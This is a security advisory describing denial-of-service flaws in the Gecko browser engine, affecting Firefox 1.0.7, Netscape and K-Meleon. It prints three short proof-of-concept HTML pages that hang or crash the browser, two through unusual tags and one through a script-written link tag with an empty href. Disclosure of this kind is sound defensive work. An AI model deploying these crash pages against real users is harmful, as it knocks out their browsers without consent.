|
|
| |
| The Gecko engine does not handle specific tags correctly, and does not validate links correctly, allowing attackers to cause DoS on the machine running the Gecko engine. |
| |
Credit:
The information has been provided by Juha-Matti Laurio .
The bug report can be found at: https://bugzilla.mozilla.org/show_bug.cgi?id=210658
The Proof of Concept of Tag Handling can be found at: http://www.milw0rm.com/id.php?id=1253
The Proof of Concept of link tag can be found at: http://www.milw0rm.com/id.php?id=1257
|
| |
Vulnerable Systems:
* Netscape Browser version 8.0.3.3
* Netscape version 7.2
* K-Meleon version 0.9
* Firefox version 1.0.7 and prior
* Mozilla suite version 1.7.12 and prior
Tag handling:
The Gecko engine is vulnerable for a DoS when managing two tags:
* <sourcetext>
* <parsererror>
By using one of this tags, it is possible to cause the system to hang with 100% CPU, and only by killing the application.
Proof of Concept 1:
< html>
< head>
< title>sourcetext element test< /title>
< /head>
< body>
< p>< sourcetext>< /sourcetext>< /p>
< /body>
< /html>
Proof of Concept 2:
< html>
< head>
< title>parsererror element test< /title>
< /head>
< body>
< p>< parsererror>< /parsererror>< /p>
< /body>
< /html>
Javascript link:
By adding link tag using Javascript, with empty not complete href statement, it is possible to cause Gecko based web browsers to crash.
Proof of Concept:
< !-- Brought to you By Kubbo. Now bring Kubbo the walrus; Goo-goo-gajoob. -- >
< html>
< script language="JavaScript">
document.write('< link rel="stylesheet" href="http://">');
< /script>
< /html>
< !-- Affects Firefox 1.0.7 and below. Adaras ron r farliga. -->
|
|
|
|
|
|
|
|
